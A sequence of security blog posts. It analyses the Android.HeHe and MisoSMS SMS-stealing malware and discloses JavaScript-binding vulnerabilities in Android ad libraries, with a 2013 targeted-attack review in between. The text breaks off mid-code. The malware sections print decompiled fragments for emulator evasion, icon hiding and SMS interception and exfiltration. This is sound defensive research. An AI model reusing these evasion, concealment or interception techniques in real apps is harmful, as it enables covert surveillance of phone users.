[caption id="attachment_4369" align="aligncenter" width="302"]Figure 1. App installs itself[/caption]


This app starts the main HeHe activity at startup. The constructor of the HeHeActivity registers a handler using the android.os.Handler class, which acts as a thread waiting for an object of type android.os.Message in order to perform different actions, outlined below.

Because the HeHeActivity implements the standard DialogInterface.OnClickListener, starting the app causes the showAlterDailog message to be displayed (Figure 2).

[caption id="attachment_4373" align="aligncenter" width="404"]Figure 2: The above messages make the user believe that an OS update check is in progress[/caption]

The app then sends an intent to start three services in the background. These services are explained below.

Sandbox-evasion tactic

This app checks for the presence of an emulator by calling the isEmulator function, which does the following:

  1. It checks the value of the MODEL of the device (emulators with the Google ADT bundle have the string “sdk” as a part of the MODEL variable).
  2. It also checks to see if the IMSI code is “null” — emulators do not have an IMSI code associated with them.

Here is the isEmulator code:

public static boolean isEmulator() {
    boolean v0;
    if((Build.MODEL.equalsIgnoreCase("sdk")) || (Build.MODEL.equalsIgnoreCase("google_sdk"))) {
        v0 = true;
    }
    else {
        v0 = false;
    }
    return v0;
}

String v0 = TelephonyUtils.getImsi(((Context)this));
if(v0 == null) {
    // IMSI is null: the device is treated as an emulator
}

The code checks whether the app is being run in the Android QEMU emulator. It also checks whether the value of the IMSI is equal to null.


This service runs in the background. Once started, the app calls the setComponentEnabledSetting method as follows:

this.getPackageManager().setComponentEnabledSetting(new ComponentName(((Context)this), HeheActivity.class), 2, 1);

This removes the app from the main menu of the phone, leading the user to believe that the app is no longer installed on the phone. It then goes on to check the network status of the phone, as shown below:

public void checkNetwork() { 
if(!this.isNetworkAvailable()) {

After the service has been created, the onStart method is called, which checks the message provided as part of the intent. The message types are START and LOGIN.


If the message in the intent is START, the app calls the sendRegisterRequest() function. The sendRegisterRequest function first checks for the presence of an emulator, as explained in the "Sandbox-evasion tactic" section.

It then collects the IMSI, IMEI, phone number, SMS address, and channel ID, and packs all of this information into a JSON object. Once created, the JSON object is converted to a string and sent to the CnC server. The CnC communication is explained below.
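The registration step described above can be sketched as follows. The field names and sample values here are illustrative guesses; the real JSON key names live in the APK, and the transport (an encrypted HTTP POST) is covered later in this post:

```python
# Sketch of the registration payload: collected device identifiers are
# packed into a JSON object and sent to the CnC as a string.
# Key names below are hypothetical, not extracted from the sample.
import json

def build_register_request(imsi, imei, phone, sms_address, channel_id):
    return json.dumps({
        "imsi": imsi,
        "imei": imei,
        "phone": phone,
        "smsAddress": sms_address,
        "channelId": channel_id,
    })

msg = build_register_request("310150123456789", "490154203237518",
                             "+15555550100", "+15555550100", "100")
assert json.loads(msg)["imei"] == "490154203237518"
```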


If the message in the intent is LOGIN, the app calls the sendLoginRequest method, which in turn collects the following:

  • Version number of the app (hard-coded as "1.0.0")
  • The model of the phone
  • The version of the operating system
  • The type of network associated with the device (GSM/CDMA)

This information is also packed into a JSON object, converted into a string, and sent to the CnC server.

RegisterBroadcastReceiver service

This service is invoked at the start of the app as the RegisterService. It in turn registers the IncomeCallAndSmsReceiver(), which is set to respond to these three intents:

  • android.provider.Telephony.SMS_RECEIVED, which notifies once an SMS has been received on the device
  • android.intent.action.PHONE_STATE, which notifies once the cellular state of the device has changed. Examples include RINGING and OFF_HOOK.
  • android.intent.action.SCREEN_ON, which notifies once the screen has been turned on or turned off.

Additionally, it also sets observers over Android content URIs as follows:

  • The SmsObserver is set to observe the content://sms, which enables it to access all SMS messages that are present on the device.
  • The CallObserver is set to observe the content://call_log/calls, which allows it to access the call log of all incoming, outgoing and missed calls on the device.


The main HeHe activity mentioned at the start issues the ACTION_START intent to the ConnectionService class as follows:

Intent v2 = new Intent(((Context)this), ConnectionService.class);


v2.setFlags(268435456);
this.startService(v2);
LogUtils.debug("heheActivity", "start connectionService service");

The app then starts a timer task that is scheduled to be invoked every 5000 seconds. This timed task does the following:
  • Creates an object instance of the android.os.Message class
  • Sets the value of "what" in the Message object to 1
  • The handler of this message that was initiated in the constructor then gets called, which in turn calls the showFinishBar function that displays the message “현재 OS에서 최신 소프트웨어버전을 사용하고있습니다,” which translates to “You are currently using the latest software version on this OS.”



The RegisterBroadcastReceiver registers this receiver once the app starts. When an SMS is received on the device, the IncomeCallAndSmsReceiver gets the intent. Because this receiver listens for one of three intents, any intent it receives is checked for its type.

If the received intent is of type android.provider.Telephony.SMS_RECEIVED, the app extracts the contents of the SMS and the phone number of the sender. If the first three characters of the phone number match the first three characters of a phone number in a table named tbl_intercept_info, the SMS intent is aborted and the SMS is deleted from the device's SMS inbox so that the user never sees it. After the SMS notification is suppressed, the app bundles the SMS as follows:

"createTime":"2014-01-10 16:21:36",

From there, it sends the bundled message to the CnC server.

It also records the SMS in the tbl_message_info table in its internal database.
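The interception check described above amounts to a three-character prefix comparison against the numbers in tbl_intercept_info. A minimal sketch, with the database table stubbed out as a plain list and hypothetical example numbers:

```python
# Sketch of Android.HeHe's interception check: the first three characters
# of the sender's number are compared against numbers the CnC placed in
# tbl_intercept_info. The table is stubbed out with a plain list here.

def should_intercept(sender: str, intercept_numbers) -> bool:
    """True if the sender's 3-char prefix matches any intercept entry."""
    return any(sender[:3] == num[:3] for num in intercept_numbers)

tbl_intercept_info = ["+15555550100", "+49301234567"]   # hypothetical entries
assert should_intercept("+15555559999", tbl_intercept_info)       # "+15" matches
assert not should_intercept("+8613800000000", tbl_intercept_info)
```

Note how coarse this is: any number sharing the three-character prefix of an intercept entry is silently suppressed.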

If the received intent is of type android.intent.action.PHONE_STATE, the app checks the tbl_intercept_info table in the local database. If the number of the caller appears in this table, then the ringer mode of the phone is set to silent to suppress the notification of the incoming call and the phone call is disconnected. Its corresponding entry from the call logs is also removed, removing all traces of the phone call from the device.

No actions have been defined for the android.intent.action.SCREEN_ON intent, even though the IncomeCallAndSmsReceiver receives it.


This app uses two hard-coded IP addresses to locate its CnC servers. The app performs all communications through HTTP POST requests, with the contents of each POST encrypted using AES and a 128-bit key that is hard-coded into the app. One address is used to check for updates, to which the app sends its lastVersion value; the other address is used to report incoming SMS messages.

Because the IP address is no longer reachable, responses from the server could not be analyzed. What is clear is that the server sends a JSON object in response, which contains a "token" field.

Although the CnC server is currently unavailable, we can infer how the app works by examining how it processes the received responses.

The app contains different data structures that are converted into their equivalent JSON representations when they are sent to the CnC, and all JSON object responses are converted back into their equivalent internal data structures. We have also observed the mechanism used to populate the internal database, which includes tables (such as tbl_intercept_info) that contain the phone numbers to be blocked.

The app uses two hxxp:// URLs to send information to the CnC server.

The mapping of URLs to their internal class data structures is as follows:

Request Class | URL
GetLastVersionRequest | /getLastVersion
RegisterRequest | /register
LoginRequest | /login
ReportRequest | /report
GetTaskRequest | /getTask
ReportMessageRequest | /reportMessage

The meaning and structures of these are explained in the following sections.


GetLastVersionRequest

This request is sent when the app is first installed on the device. The bot sends the version code of the app (currently set to 1.0.0) to the CnC. The CnC response contains the URL of an update, if one is available; availability is signified through an “update” field in the response.

[caption id="attachment_4377" align="alignnone" width="816"]Request to CnC to check for version[/caption]


RegisterRequest

This request is sent when the app sends an intent with a “LOGIN” option to the RegisterService, as explained above. The request contains the IMSI, IMEI, phone number, SMS address (phone number), channel ID, a token, and the IP address the app is using as its CnC. This registers the infected device with the CnC.


LoginRequest

This request is sent to further authenticate the device to the CnC. It contains the previously received token, the version of the bot, the model of the phone, the version of the OS, the type of network, and other active network parameters such as signal strength. In response, it receives only a result value.


ReportRequest

The report request sends the information present in tbl_report_info to the CnC. This table contains information about requests that were sent earlier but failed.


GetTaskRequest

This request asks the CnC server for tasks. The response contains a retry interval and a sendSmsActionNotify value. It is sent when the response to the LoginRequest is 401 instead of 200.


ReportMessageRequest

This request sends the CnC the contents of the SMS messages received on the device: the message body, the time of the message, and the sender. We have also observed this behavior in the logcat output.



Android malware variants are mushrooming. Threats such as Android.HeHe and Android.MisoSMS reveal attackers' growing interest in monitoring SMS messages and phone call logs. They also serve as a stark reminder of just how dangerous apps from non-trusted marketplaces can be.

JS-Binding-Over-HTTP Vulnerability and JavaScript Sidedoor: Security Risks Affecting Billions of Android App Downloads

Third-party libraries, especially ad libraries, are widely used in Android apps. Unfortunately, many of them have security and privacy issues. In this blog, we summarize our findings related to the insecure usage of JavaScript binding in ad libraries.

First, we describe a widespread security issue with using JavaScript binding (addJavascriptInterface) and loading WebView content over HTTP, which allows a network attacker to take control of the application by hijacking the HTTP traffic. We call this the JavaScript-Binding-Over-HTTP (JS-Binding-Over-HTTP) vulnerability. Our analysis shows that, currently, at least 47 percent of the top 40 ad libraries have this vulnerability in at least one of their versions that are in active use by popular apps on Google Play.

Second, we describe a new security issue with the JavaScript binding annotation, which we call JavaScript Sidedoor. Starting with Android 4.2, Google introduced the @JavascriptInterface annotation to explicitly designate and limit which public methods in Java objects are accessible from JavaScript. If an ad library uses the @JavascriptInterface annotation to expose security-sensitive interfaces, and uses HTTP to load content in the WebView, then an attacker over the network could inject malicious content into the WebView and misuse the interfaces exposed through the JS binding annotation. We call these exposed interfaces JS sidedoors.

Our analysis shows that these security issues are widespread, affecting popular apps on Google Play that together account for billions of app downloads. The parties we notified about these issues have been actively addressing them.

Security Issues with JavaScript Binding over HTTP

Android uses the JavaScript binding method addJavascriptInterface to enable JavaScript code running inside a WebView to access the app’s Java methods. However, it is widely known that this feature, if not used carefully, presents a potential security risk when running on Android 4.1 or below. As noted by Google: “Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application.” [1]

In particular, if an app running on Android 4.1 or below uses the JavaScript binding method addJavascriptInterface and loads the content in the WebView over HTTP, then an attacker over the network could hijack the HTTP traffic, e.g., through WiFi or DNS hijacking, to inject malicious content into the WebView – and thus take control of the host application. We call this the JavaScript-Binding-Over-HTTP (JS-Binding-Over-HTTP) vulnerability. If an app containing such a vulnerability holds sensitive Android permissions, such as access to the camera, then a remote attacker could exploit it to perform sensitive tasks, such as taking photos or recording video, over the Internet, without the user’s consent.
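
The exploitability condition described above can be summarized in a small check. This is a heuristic sketch of the post's criteria, not production detection logic; API level 16 corresponds to Android 4.1, and the URL is a placeholder:

```java
public class JsBindingCheck {
    // Heuristic from the post: a WebView is exposed to the JS-Binding-Over-HTTP
    // attack when JS binding is enabled, content is loaded over plain HTTP, and
    // the device runs Android 4.1 (API 16) or below.
    static boolean isVulnerable(boolean usesAddJavascriptInterface,
                                String contentUrl, int apiLevel) {
        return usesAddJavascriptInterface
            && contentUrl.startsWith("http://")
            && apiLevel <= 16;
    }

    public static void main(String[] args) {
        System.out.println(isVulnerable(true, "http://ads.example.com/ad.html", 16));  // true
        System.out.println(isVulnerable(true, "https://ads.example.com/ad.html", 16)); // false
    }
}
```

HTTPS removes the network attacker's injection point, which is why the recommendations later in the post center on loading WebView content over HTTPS.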

We have analyzed the top 40 third-party ad libraries (not including Google Ads) used by Android apps. Among the apps with over 100,000 downloads each on Google Play, over 42 percent of the free apps currently contain at least one of these top ad libraries, and the total download count of such apps now exceeds 12.4 billion. From our analysis, at least 47 percent of these top 40 ad libraries have at least one version of their code in active use by popular apps on Google Play that contains the JS-Binding-Over-HTTP vulnerability. As an example, InMobi versions 2.5.0 and above use the JavaScript binding method addJavascriptInterface and load content in the WebView over HTTP.

Security Issues with JavaScript Binding Annotation

Starting with Android 4.2, Google introduced the @JavascriptInterface annotation to explicitly designate and limit which public Java methods in the app are accessible from JavaScript running inside a WebView. However, note that the @JavascriptInterface annotation does not provide any protection for devices using Android 4.1 or below, which is still running on more than 80 percent of Android devices worldwide.

We discovered a new class of security issues, which we call JavaScript Sidedoor (JS sidedoor), in ad libraries. If an ad library uses the @JavascriptInterface annotation to expose security-sensitive interfaces, and uses HTTP to load content in the WebView, then it is vulnerable to attacks where an attacker over the network (e.g., via WIFI or DNS hijacking) could inject malicious content into the WebView to misuse the interfaces exposed through the JS binding annotation. We call these exposed JS binding annotation interfaces JS sidedoors.

For example, starting with version 3.6.2, InMobi added the @JavascriptInterface JS binding annotation. The list of exposed methods through the JS binding annotation in InMobi includes:

  • createCalendarEvent (version 3.7.0 and above)
  • makeCall (version 3.6.2 and above)
  • postToSocial (version 3.7.0 and above)
  • sendMail (version 3.6.2 and above)
  • sendSMS (version 3.6.2 and above)
  • takeCameraPicture (version 3.7.0 and above)
  • getGalleryImage (version 3.7.0 and above)
  • registerMicListener (version 3.7.0 and above)

InMobi also provides JavaScript wrappers to these methods in the JavaScript code served from their ad servers, as shown in Appendix A.

InMobi also loads content in the WebView using HTTP. If an app has the Android permission CALL_PHONE, and is using InMobi versions 3.6.2 to 4.0.2, an attacker over the network (for example, using Wi-Fi or DNS hijacking) could abuse the makeCall annotation in the app to make phone calls on the device without a user’s consent – including to premium numbers.

In addition, without requiring special Android permissions in the host app, an attacker over the network (via HTTP or DNS hijacking) could misuse the other exposed methods to trick the user into posting to the user’s social network from the device (postToSocial, version 3.7.0 and above), send email to any designated recipient with a pre-crafted title and body (sendMail, version 3.6.2 and above), send SMS to premium numbers (sendSMS, version 3.6.2 and above), create calendar events on the device (createCalendarEvent, version 3.7.0 and above), and take pictures and access the photo gallery on the device (takeCameraPicture and getGalleryImage, version 3.7.0 and above). To complete these actions, the user would need to click certain consent buttons; however, users are quite vulnerable to social engineering attacks through which attackers can trick them into giving consent.

We have identified more than 3,000 apps on Google Play that contain versions 2.5.0 to 4.0.2 of InMobi – and which have over 100,000 downloads each as of December 2013. Currently, the total download count for these affected apps is greater than 3.7 billion.

We have informed both Google and InMobi of our findings, and they have been actively working to address them.

New InMobi Update after FireEye Notification

After we notified InMobi about these security issues, they promptly released new SDK versions 4.0.3 and 4.0.4. The 4.0.3 SDK, marked as “Internal release”, was superseded by 4.0.4 after one day. The 4.0.4 SDK made the following changes:

  1. Changed the method exposed through annotation for making phone calls (makeCall) to require the user’s consent.
  2. Added a new storePicture interface to download and save specified files from the Internet to the user’s Downloads folder. Despite the name, it can be used for any file, not just images.

Compared with InMobi’s earlier versions, we consider change No. 1 an improvement that addresses the aforementioned issue of an attacker making phone calls without a user’s consent. We are glad to see that InMobi made this change after our notification.

    InMobi recently released a new SDK version 4.1.0. Compared with SDK version 4.0.4, we haven't seen any changes to JS Binding usage from a security perspective in this new SDK version 4.1.0.

    Moving Forward: Improving Security for JS Binding in Third-party Libraries

    In summary, the insecure usage of JS Binding and JS Binding annotations in third-party libraries exposes many apps that contain these libraries to security risks.

    App developers and third-party library vendors often focus on new features and rich functionalities. However, this needs to be balanced with a consideration for security and privacy risks. We propose the following to the mobile application development and library vendor community:

    1. Third-party library vendors need to explicitly disclose security-sensitive features in their privacy policies and/or their app developer SDK guides.
    2. Third-party library vendors need to educate the app developers with information, knowledge, and best practices regarding security and privacy when leveraging their SDK.
    3. App developers need to use caution when leveraging third-party libraries, apply best practices on security and privacy, and in particular, avoid misusing vulnerable APIs or packages.
    4. When third-party libraries use JS Binding, we recommend using HTTPS for loading content.
    5. Since customers may have different requirements regarding security and privacy, apps with JS-Binding-Over-HTTP vulnerabilities and JS sidedoors can introduce risks to security-sensitive environments such as enterprise networks. FireEye Mobile Threat Prevention provides protection to our customers from these kinds of security threats.


      We thank our team members Adrian Mettler and Zheng Bu for their help in writing this blog.

      Appendix A: JavaScript Code Snippets Served from InMobi Ad Servers

      a.takeCameraPicture = function () {
          // (body elided in this excerpt)
      };

      a.getGalleryImage = function () {
          // (body elided in this excerpt)
      };

      a.makeCall = function (f) {
          try {
              // (call elided in this excerpt)
          } catch (d) {
              a.showAlert("makeCall: " + d)
          }
      };

      a.sendMail = function (f, d, b) {
          try {
              utilityController.sendMail(f, d, b)
          } catch (c) {
              a.showAlert("sendMail: " + c)
          }
      };

      a.sendSMS = function (f, d) {
          try {
              utilityController.sendSMS(f, d)
          } catch (b) {
              a.showAlert("sendSMS: " + b)
          }
      };

      a.postToSocial = function (a, c, b, e) {
          a = parseInt(a);
          isNaN(a) && window.mraid.broadcastEvent("error", "socialType must be an integer", "postToSocial");
          "string" != typeof c && (c = "");
          "string" != typeof b && (b = "");
          "string" != typeof e && (e = "");
          utilityController.postToSocial(a, c, b, e)
      };

      a.createCalendarEvent = function (a) {
          "object" != typeof a && window.mraid.broadcastEvent("error",
              "createCalendarEvent method expects parameter", "createCalendarEvent");
          "string" != typeof a.start || "string" != typeof a.end ?
              window.mraid.broadcastEvent("error",
                  "createCalendarEvent method expects string parameters for start and end dates",
                  "createCalendarEvent") :
              ("string" != typeof a.location && (a.location = ""),
               "string" != typeof a.description && (a.description = ""),
               utilityController.createCalendarEvent(a.start, a.end, a.location, a.description))
      };

      a.registerMicListener = function () {
          // (body elided in this excerpt)
      };

      Trends in Targeted Attacks: 2013

      FireEye has been busy over the last year. We have tracked malware-based espionage campaigns and published research papers on numerous advanced threat actors. We chopped through Poison Ivy, documented a cyber arms dealer, and revealed that Operation Ke3chang had targeted Ministries of Foreign Affairs in Europe.

      Worldwide, security experts made many breakthroughs in cyber defense research in 2013. I believe the two biggest stories were Mandiant’s APT1 report and the ongoing Edward Snowden revelations, including the revelation that the U.S. National Security Agency (NSA) compromised 50,000 computers around the world as part of a global espionage campaign.

      In this post, I would like to highlight some of the outstanding research from 2013.

      Trends in Targeting

      Targeted malware attack reports tend to focus on intellectual property theft within specific industry verticals. But this year, there were many attacks that appeared to be related to nation-state disputes, including diplomatic espionage and military conflicts.


      Where kinetic conflict and nation-state disputes arise, malware is sure to be found. Here are some of the more interesting cases documented this year:

      • Middle East: continued attacks targeting the Syrian opposition; further activity by Operation Molerats related to Israel and Palestinian territories.
      • India and Pakistan: tenuous relations in the physical world equate to tenuous relations in cyberspace. Exemplifying this trend were the Indian malware group Hangover, the ByeBye attacks against Pakistan, and Pakistan-based attacks against India.
      • Korean peninsula: perhaps foreshadowing future conflict, North Korea was likely behind the Operation Troy (also known as DarkSeoul) attacks on South Korea that included defacements, distributed denial-of-service (DDoS) attacks, and malware that wiped hard disks. Another campaign, Kimsuky, may also have a North Korean connection.
      • China: this was the source of numerous attacks, including the ongoing Surtr campaign against the Tibetan and Uyghur communities, which targeted both MacOS and Android.


      Malware continues to play a key role in espionage in the Internet era. Here are some examples that stood out this year:

      • The Snowden documents revealed that NSA and GCHQ deployed key logging malware during the G20 meeting in 2009.
      • In fact, G20 meetings have long been targets for foreign intelligence services, including this year’s G20 meeting in Russia.
      • The Asia-Pacific Economic Cooperation (APEC) and The Association of Southeast Asian Nations (ASEAN) are also frequent targets.
      • FireEye announced that Operation Ke3chang compromised at least five Ministries of Foreign Affairs in Europe.
      • Red October, EvilGrab, and Nettraveler (aka RedStar) targeted both diplomatic missions and commercial industries.

      Technical Trends

      Estimations of “sophistication” often dominate the coverage of targeted malware attacks. But what I find interesting is that simple changes made to existing malware are often more than enough to evade detection. Even more surprising is that technically “unsophisticated” malware is often found in the payload of “sophisticated” zero-day exploits. And this year quite a number of zero-days were used in targeted attacks.


      Quite a few zero-day exploits appeared in the wild this year, including eleven discovered by FireEye. These exploits included techniques to bypass ASLR and application sandboxes. The exploits that I consider the most significant are the following:


      The malware samples used by several advanced persistent threat (APT) actors were slightly modified this year, possibly in response to increased scrutiny, in order to avoid detection. For example, there were changes to Aumlib and Ixeshe, malware families associated with APT12, the group behind attacks on the New York Times. When APT1 (aka Comment Crew) returned after their activities were exposed, they also used modified malware. In addition, Terminator (aka FakeM) and Sykipot were modified.

      Threat Actors

      Attribution is a tough problem, and the term itself has multiple meanings. Some use it to refer to an ultimate benefactor, such as a nation-state. Others use the term to refer to malware authors, or command-and-control (CnC) operators. This year, I was fascinated by published research about exploit and malware dealers and targeted attack contractors (also known as cyber “hitmen”), because it further complicates the traditional “state-sponsored” analysis that we’ve become accustomed to.

      • Dealers — The malware and exploits used in targeted attacks are not always exclusively available to one threat actor. Some are supplied by commercial entities such as FinFisher, which has been reportedly used against activists around the world, and HackingTeam, which sells spyware to governments and law enforcement agencies. FireEye discovered a likely cyber arms dealer that is connected to no fewer than 11 APT campaigns – however, the relationship between the supplier and those who use the malware remains unclear. Another similar cluster, known as the Maudi Operation, was also documented this year.
      • Hitmen — Although this analysis is still highly speculative, some threat actors, such as Hidden Lynx, may be “hackers for hire”, tasked with breaking into targets and acquiring specific information. Others, such as IceFog, engage in “hit and run” attacks, including the propagation of malware in a seemingly random fashion. Another group, known as Winnti, tries to profit by targeting gaming companies with malware (PlugX) that is normally associated with APT activity. In one of the weirdest cases I have seen, malware known as “MiniDuke”, which is reminiscent of some “old school” malware developed by 29A, was used in multiple attacks around the world.

      My colleagues at FireEye anticipate some interesting stealthy techniques emerging in the near future. In any case, 2014 will no doubt be another busy year for those of us who research targeted malware attacks.

      MisoSMS: New Android Malware Disguises Itself as a Settings App, Steals SMS Messages

      FireEye has uncovered and helped weaken one of the largest advanced mobile botnets to date. The botnet, which we are dubbing “MisoSMS,” has been used in at least 64 spyware campaigns, stealing text messages and emailing them to cybercriminals in China.

      MisoSMS infects Android systems by deploying a class of malicious Android apps. The mobile malware masquerades as an Android settings app used for administrative tasks. When executed, it secretly steals the user’s personal SMS messages and emails them to a command-and-control (CnC) infrastructure hosted in China. The FireEye Mobile Threat Prevention platform detects this class of malware as “Android.Spyware.MisoSMS.”

      Here are some highlights of MisoSMS:

      • We discovered 64 mobile botnet campaigns that belong to the MisoSMS malware family.
      • Each of the campaigns leverages Web mail as its CnC infrastructure.
      • The CnC infrastructure comprises more than 450 unique malicious email accounts.
      • FireEye has been working with the community to take down the CnC infrastructure.
      • The majority of the infected devices are in Korea, which leads us to believe that this threat is active and prevalent in that region.
      • The attackers logged in from Korea and mainland China, among other locations, to periodically read the stolen SMS messages.

      MisoSMS is active and widespread in Korea, and we are working with Korean law enforcement and the Chinese Web mail vendor to mitigate this threat. This threat highlights the need for greater cross-country and cross-organizational efforts to take down large malicious campaigns.

      At the time of this blog post, all of the reported malicious email accounts have been deactivated and we have not noticed any new email addresses getting registered by the attacker. FireEye Labs will closely monitor this threat and continue working with the relevant authorities to mitigate it.

      Technical Analysis

      Once the app is installed, it presents itself as “Google Vx.” It asks for administrative permissions on the device, which enables the malware to hide itself from the user, as shown in Figure 2.


      The message in Figure 3 translates to the following:

      “This service is vaccine killer \nCopyright (c) 2013”


      Once the user grants administrator privileges to the app, it shows a message that translates to “The file is damaged and can’t use. Please check it on the website”, with an OK button. It then asks the user to confirm deletion, ostensibly offering Confirm and Cancel options. If the user taps Confirm, the app sleeps for 800 milliseconds before displaying a message that says “Remove Complete.” If the user taps Cancel, the app still displays the “Remove Complete” message.

      In either case, the following API call is made to hide the app from the user (the captured arguments match PackageManager.setComponentEnabledSetting):

      MainActivity.this.getPackageManager().setComponentEnabledSetting(
              MainActivity.this.getComponentName(), 2, 1);

      Here 2 corresponds to PackageManager.COMPONENT_ENABLED_STATE_DISABLED and 1 to PackageManager.DONT_KILL_APP: the app’s launcher component is disabled without killing the running process.

      This application exfiltrates the SMS messages in a unique way. Some SMS-stealing malware forwards the contents of users' SMS messages over SMS to phone numbers under the attacker’s control. Others send the stolen SMS messages to a CnC server over TCP connections. This malicious app, by contrast, sends the stolen SMS messages to the attacker's email address over an SMTP connection. Most of the MisoSMS-based apps we discovered had no or very few vendor detections on VirusTotal.
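
To illustrate the SMTP-based exfiltration path (as opposed to SMS forwarding or raw TCP), here is a sketch of the command sequence such a client would issue over its socket. The addresses and message fields are placeholders, not values from the campaign:

```java
import java.util.List;

public class SmtpExfilSketch {
    // Builds a minimal SMTP dialogue for one exfiltrated SMS. Per the analysis,
    // the subject is the infected device's phone number and the body carries
    // the sender and contents of the intercepted message.
    static List<String> smtpCommands(String from, String to,
                                     String subject, String body) {
        return List.of(
            "HELO client",
            "MAIL FROM:<" + from + ">",
            "RCPT TO:<" + to + ">",
            "DATA",
            "Subject: " + subject,
            "",
            body,
            ".",
            "QUIT");
    }

    public static void main(String[] args) {
        smtpCommands("bot@attacker.example", "drop@attacker.example",
                     "+10000000000", "sender=+10000000001 content=hello")
            .forEach(System.out::println);
    }
}
```

Because the traffic rides ordinary outbound SMTP to legitimate Web mail accounts, it blends in far better than SMS forwarding, which leaves traces in the victim's sent messages and billing records.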

      The app initially sends an email with the phone number of the target’s device in the message body. This is shown in the screenshot capture below.



      The malicious app creates a database called “soft_data” at install time. It also creates a database table by executing the SQL query below.

      paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS ulccd(id varchar(50),sender varchar(50),date varchar(20),content varchar(500))");

      The application registers a service for the SMS_RECEIVED intent. Once it receives the intent, the app invokes a call to the com.mlc.googlevx.SinRecv.onGetMsg() method. The moment a MisoSMS-infected device receives an SMS, the method extracts the contents of that SMS and creates the key-value pairs as follows:

      ("sender", this.val$str1);              // Phone number of the sender of the SMS

      ("content", this.val$str2);             // Content of the SMS message

      ("date", this.val$str3);                // Date of the SMS

      ("id", "1");                            // Hardcoded identifier

      ("key",;                // Device ID

      ("op", "Add");                          // Operation to be performed “Add” indicates SMS to be added

      ("phone_number", xdataStruct.selfnum);  // Phone number of the infected user

      The above data is recorded and an email message is sent out with the subject line set to the phone number of the infected device. The body of the email message contains the phone number of the device that sent a message to the infected device and its contents. Figure 6 below shows a packet capture of this data as it is sent.


      If the sending of the email fails, it logs the SMS messages in the soft_data database.

      The application also starts three services in the background once the app is installed and started: RollService, MisoService, and BaseService.


      RollService

      This service sleeps for the first five minutes of execution. After that, RollService polls the soft_data database and tries to send any SMS data that previously failed to send. Once the information is sent successfully, RollService deletes it from the soft_data database.
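
RollService's retry loop amounts to a poll-send-delete cycle over the failure store. A minimal sketch, with an in-memory queue standing in for the soft_data database and a stubbed send:

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Iterator;

public class RollServiceSketch {
    // In-memory stand-in for the soft_data table of messages that failed to send.
    static final Deque<String> softData = new ArrayDeque<>();

    // Stub for the SMTP send; the real service would attempt delivery here.
    static boolean trySend(String msg) { return true; }

    // One polling pass: try to resend each stored message, deleting it from
    // the store only after a successful send (mirroring RollService).
    static void pollOnce() {
        Iterator<String> it = softData.iterator();
        while (it.hasNext()) {
            String msg = it.next();
            if (trySend(msg)) {
                it.remove();
            }
        }
    }

    public static void main(String[] args) {
        softData.add("msg1");
        softData.add("msg2");
        pollOnce();
        System.out.println(softData.size()); // 0
    }
}
```

Deleting only after a confirmed send is what makes the exfiltration resilient to transient network failures.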


      MisoService

      Once started, MisoService spawns a background thread that is responsible for relaying information to the CnC channel. Messages are relayed using data structures that are converted into byte streams. The components of those structures are shown below:

      Request Structure:

      public final int Request_BookInfo_len = 70;
      public final int Request_Head_Len = 95;
      public final int Request_RecPhoneInfo_Len = 8;

      public Vector<RequestStruct_BookInfo> book_list = new Vector();  // each entry contains:
          public String book_name = "";
          public String book_num = "";

      public RequestStruct_Head data_head = new RequestStruct_Head();  // contains:
          public String android_id = "";
          public int book_count = 0;
          public short client_version = 1;
          public byte is_back_door = 0;
          public String os_version = "";
          public short phone_book_state = 0;
          public String phone_model = "";
          public String phone_num = "";
          public short sms_rec_phone_count = 0;
          public int sms_task_id = 0;

      public Vector<RequestStruct_RecPhoneInfo> rec_phone_list = new Vector();  // each entry contains:
          public int reccode = 0;
          public int recphoneid = 0;

      Replay Structure:

      public final int Replay_Head_Len = 583;
      public final int Replay_NewAddr_Len = 261;
      public final int Replay_RecPhone_len = 24;

      public ReplayStruct_Head data_head = new ReplayStruct_Head();  // contains:
          public byte is_send_book = 0;
          public byte is_uninstall_backdoor = 0;
          public byte is_upbook = 0;
          public byte is_update = 0;
          public String last_client_url = "";
          public short last_client_url_len = 0;
          public short last_client_version = 1;
          public short new_addr_count = 0;
          public short reconn_deply = 300;
          public String sms_task_content = "";
          public int sms_task_id = 0;
          public short sms_task_rec_phone_count = 0;

      public Vector<ReplayStruct_NewAddrInfo> new_addr_list = new Vector();  // each entry contains:
          public short new_addr_len = 0;
          public int new_addr_port = 8080;
          public String new_addr_url = "";

      public Vector<ReplayStruct_RecPhoneInfo> rec_phone_list = new Vector();  // each entry contains:
          public int rec_phone_id = 0;
          public String rec_phone_num = "";

      Once MisoService is initiated, it checks whether the phone is connected to the Internet and the cellular network. If so, it sends a byte array formed by the request data structure shown above. It then makes a copy of data from the request structure into the replay structure and sends the byte array of the request structure via SMS.
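
The fixed-length byte-stream conversion can be sketched with a ByteBuffer. The field order, offsets, and byte order here are assumptions for illustration; the analysis gives only the declared lengths, e.g. a 95-byte request head:

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public class HeadPackSketch {
    // Illustrative packing of a few RequestStruct_Head fields into a
    // fixed-length 95-byte buffer (Request_Head_Len from the excerpt).
    static byte[] pack(short clientVersion, byte isBackDoor, int smsTaskId) {
        ByteBuffer buf = ByteBuffer.allocate(95).order(ByteOrder.LITTLE_ENDIAN);
        buf.putShort(clientVersion);  // hypothetical field order
        buf.put(isBackDoor);
        buf.putInt(smsTaskId);
        // remaining bytes stay zeroed, padding the structure to its fixed length
        return buf.array();
    }

    public static void main(String[] args) {
        System.out.println(pack((short) 1, (byte) 0, 0).length); // 95
    }
}
```

Fixed-length, zero-padded structures like these are easy to parse on the CnC side with a single read of a known size, which fits the declared `*_Len` constants in the decompiled code.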

      The phone number for this SMS is not specified in the code, so these messages are not sent for the time being. But all of this information is logged into the soft_data database, and an update to the app could start sending the SMS and the above-mentioned data. MisoService also uses an embedded shared object, invoked through the Java Native Interface, to open socket connections to the SMTP server. This shared object is unique to this malware family, which is why we named the malware Android.Spyware.MisoSMS.

      Here is an excerpt of the code for the MisoService:



      static {
          // (static initializer elided in the excerpt; presumably loads the
          // embedded native library used for the SMTP socket connection)
      }

      static byte[] access$1(byte[] arg1) {
              return MisoService.jndkAction(arg1);
      }

      private static native byte[] jndkAction(byte[] arg0);

      public void onCreate() {
          new Thread() {
              public void run() {
                  while(true) {
                      if((BaseSystem.isNetworkAvailable(MisoService.this.context)) &&
                              (BaseSystem.isPhoneAvailable(MisoService.this.context))) {
